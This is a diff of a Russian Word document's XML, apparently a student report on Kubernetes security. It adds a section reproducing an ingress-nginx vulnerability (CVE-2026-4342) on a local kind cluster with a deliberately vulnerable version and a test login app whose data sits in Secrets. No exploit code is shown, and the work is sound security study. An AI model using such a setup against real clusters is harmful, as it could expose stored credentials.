         <w:t xml:space="preserve">абстракция, находящаяся над подами, которая обеспечивает коммуникацию между этими подами, а также имеет возможность выделить для нескольких подов статический </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>ip</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>-</w:t>
       </w:r>
@@ -3238,7 +3219,6 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="15" w:name="_Toc231073612"/>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3246,17 +3226,14 @@
         <w:t>ConfigMap</w:t>
       </w:r>
       <w:bookmarkEnd w:id="15"/>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>ConfigMap</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> – </w:t>
       </w:r>
@@ -3266,19 +3243,11 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ConfigMap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ConfigMap </w:t>
       </w:r>
       <w:r>
         <w:t>служит для хранения только публичной информации.</w:t>
@@ -3509,7 +3478,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="-0"/>
+        <w:pStyle w:val="-1"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">автоматическое развертывание и управление контейнерами; </w:t>
@@ -3517,7 +3486,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="-0"/>
+        <w:pStyle w:val="-1"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">возможность горизонтального масштабирования приложений; </w:t>
@@ -3525,7 +3494,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="-0"/>
+        <w:pStyle w:val="-1"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">автоматическое восстановление контейнеров при сбоях; </w:t>
@@ -3533,7 +3502,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="-0"/>
+        <w:pStyle w:val="-1"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">балансировку нагрузки между экземплярами приложения; </w:t>
@@ -3541,7 +3510,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="-0"/>
+        <w:pStyle w:val="-1"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">поддержку rolling updates и rollback при обновлениях; </w:t>
@@ -3549,7 +3518,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="-0"/>
+        <w:pStyle w:val="-1"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">переносимость приложений между разными средами: локальной, облачной и гибридной; </w:t>
@@ -3557,7 +3526,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="-0"/>
+        <w:pStyle w:val="-1"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">эффективное использование ресурсов кластера; </w:t>
@@ -3565,7 +3534,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="-0"/>
+        <w:pStyle w:val="-1"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">удобное управление конфигурациями и секретами; </w:t>
@@ -3573,7 +3542,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="-0"/>
+        <w:pStyle w:val="-1"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">развитую экосистему инструментов и расширений; </w:t>
@@ -3581,7 +3550,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="-0"/>
+        <w:pStyle w:val="-1"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">поддержку микросервисной архитектуры. </w:t>
@@ -3599,7 +3568,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="-0"/>
+        <w:pStyle w:val="-1"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="38"/>
@@ -3612,7 +3581,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="-0"/>
+        <w:pStyle w:val="-1"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">сложность настройки и администрирования кластера; </w:t>
@@ -3620,7 +3589,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="-0"/>
+        <w:pStyle w:val="-1"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">необходимость постоянного мониторинга и сопровождения; </w:t>
@@ -3628,7 +3597,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="-0"/>
+        <w:pStyle w:val="-1"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">дополнительные расходы на инфраструктуру и поддержку; </w:t>
@@ -3636,7 +3605,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="-0"/>
+        <w:pStyle w:val="-1"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">сложность диагностики ошибок и сетевых проблем; </w:t>
@@ -3644,7 +3613,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="-0"/>
+        <w:pStyle w:val="-1"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">необходимость тщательной настройки безопасности; </w:t>
@@ -3652,7 +3621,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="-0"/>
+        <w:pStyle w:val="-1"/>
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -3661,7 +3630,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="-0"/>
+        <w:pStyle w:val="-1"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">зависимость от квалификации команды DevOps/SRE; </w:t>
@@ -3669,7 +3638,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="-0"/>
+        <w:pStyle w:val="-1"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">возможное усложнение архитектуры проекта; </w:t>
@@ -3677,7 +3646,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="-0"/>
+        <w:pStyle w:val="-1"/>
       </w:pPr>
       <w:r>
         <w:t>потребность в дополнительных инструментах для логирования, мониторинга и CI/CD.</w:t>
@@ -3967,14 +3936,12 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Standarts</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">. Также настроить </w:t>
       </w:r>
@@ -4099,14 +4066,12 @@
       <w:r>
         <w:t xml:space="preserve"> и </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>servive</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -4563,19 +4528,11 @@
                 <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>Ngingx</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Configuration Injection</w:t>
+              <w:t>Ngingx Configuration Injection</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4851,14 +4808,12 @@
               </w:rPr>
               <w:t xml:space="preserve"> S</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
               </w:rPr>
               <w:t>ecrets</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="ru-RU"/>
@@ -5133,9 +5088,15 @@
     </w:tbl>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="-"/>
-        <w:ind w:left="0" w:firstLine="0"/>
-      </w:pPr>
+        <w:pStyle w:val="-0"/>
+        <w:ind w:left="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="ru-RU"/>
@@ -5165,6 +5126,484 @@
         <w:t>-2026-4342</w:t>
       </w:r>
       <w:bookmarkEnd w:id="25"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Для создания локального кластера был использован модуль </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kind</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, который позволяет создать </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">кластер внутри </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>docker</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>контейнера.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12DFA86D" wp14:editId="7D455E98">
+            <wp:extent cx="6480175" cy="1959610"/>
+            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
+            <wp:docPr id="932356244" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="932356244" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6480175" cy="1959610"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Первый запуск </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kind</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>и проверка состояния кластера</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Далее был созданн простой кластер </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, состоящий из 3 копий приложения, где указана форма для регистрации/авторизации пользователя. Данные пользователя будут хранится в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Secret </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">кластера. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23F45B2E" wp14:editId="6FD3E919">
+            <wp:extent cx="6480175" cy="3644900"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="770521196" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="770521196" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6480175" cy="3644900"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Схема созданного кластера</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Для экплуатации уязвимости необходимо развернуть </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ingress</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nginx</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">конкретно версии </w:t>
+      </w:r>
+      <w:r>
+        <w:t>1.14.4</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F19A54C" wp14:editId="6DF8E017">
+            <wp:extent cx="6480175" cy="1371600"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1170599746" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1170599746" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6480175" cy="1371600"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Установка уязвимой версии </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ingress</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nginx</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Далее был собран </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Docker</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>образ приложения</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, а также он был запущен внутри кластера. Далее были соз</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">даны все </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>pods</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>deployment</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ingress</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">с помощью </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kind</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, а также запущены все конфиги для компонентов.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50CC69D5" wp14:editId="7BD0A0FB">
+            <wp:extent cx="6480175" cy="4862195"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="511755822" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="511755822" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6480175" cy="4862195"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Тестовое приложение с авторизацией пользователей</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Для проверки уязвимости данные </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Secret</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>были декодированны главным пользователем, имеющим прямой доступ к ним.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76240210" wp14:editId="20CCB47B">
+            <wp:extent cx="6480175" cy="1450340"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="884838214" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="884838214" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6480175" cy="1450340"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Исходные данные </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Secret</w:t>
+      </w:r>
     </w:p>
     <w:p/>
     <w:p/>
@@ -5182,7 +5621,6 @@
     <w:p/>
     <w:p/>
     <w:p/>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -5266,75 +5704,11 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="30" w:name="_Toc518292933"/>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Malmain</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> R., </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Fioraldi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> A., Francillon A. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>LibAFL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> QEMU: A library for fuzzing-oriented </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>emulation //</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">BAR 2024, Workshop on Binary Analysis Research, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>colocated</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> with NDSS 2024. – 2024.</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Malmain R., Fioraldi A., Francillon A. LibAFL QEMU: A library for fuzzing-oriented emulation //BAR 2024, Workshop on Binary Analysis Research, colocated with NDSS 2024. – 2024.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5352,35 +5726,7 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">Nam D. et al. Using </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>an</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>llm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to help with code understanding //Proceedings of the IEEE/ACM 46th International Conference on Software Engineering. – 2024. – С. 1-13.</w:t>
+        <w:t>Nam D. et al. Using an llm to help with code understanding //Proceedings of the IEEE/ACM 46th International Conference on Software Engineering. – 2024. – С. 1-13.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5418,8 +5764,8 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="even" r:id="rId12"/>
-      <w:headerReference w:type="default" r:id="rId13"/>
+      <w:headerReference w:type="even" r:id="rId17"/>
+      <w:headerReference w:type="default" r:id="rId18"/>
       <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
       <w:pgMar w:top="1134" w:right="567" w:bottom="1134" w:left="1134" w:header="709" w:footer="680" w:gutter="0"/>
       <w:cols w:space="720"/>
@@ -5645,14 +5991,7 @@
         <w:rStyle w:val="PageNumber"/>
         <w:noProof/>
       </w:rPr>
-      <w:t>7</w:t>
-    </w:r>
-    <w:r>
-      <w:rPr>
-        <w:rStyle w:val="PageNumber"/>
-        <w:noProof/>
-      </w:rPr>
-      <w:t>4</w:t>
+      <w:t>74</w:t>
     </w:r>
     <w:r>
       <w:rPr>
@@ -6663,6 +7002,96 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="232F7CCC"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="C0609B18"/>
+    <w:lvl w:ilvl="0" w:tplc="B88095D4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:pStyle w:val="-"/>
+      <w:lvlText w:val="Рисунок %1 - "/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
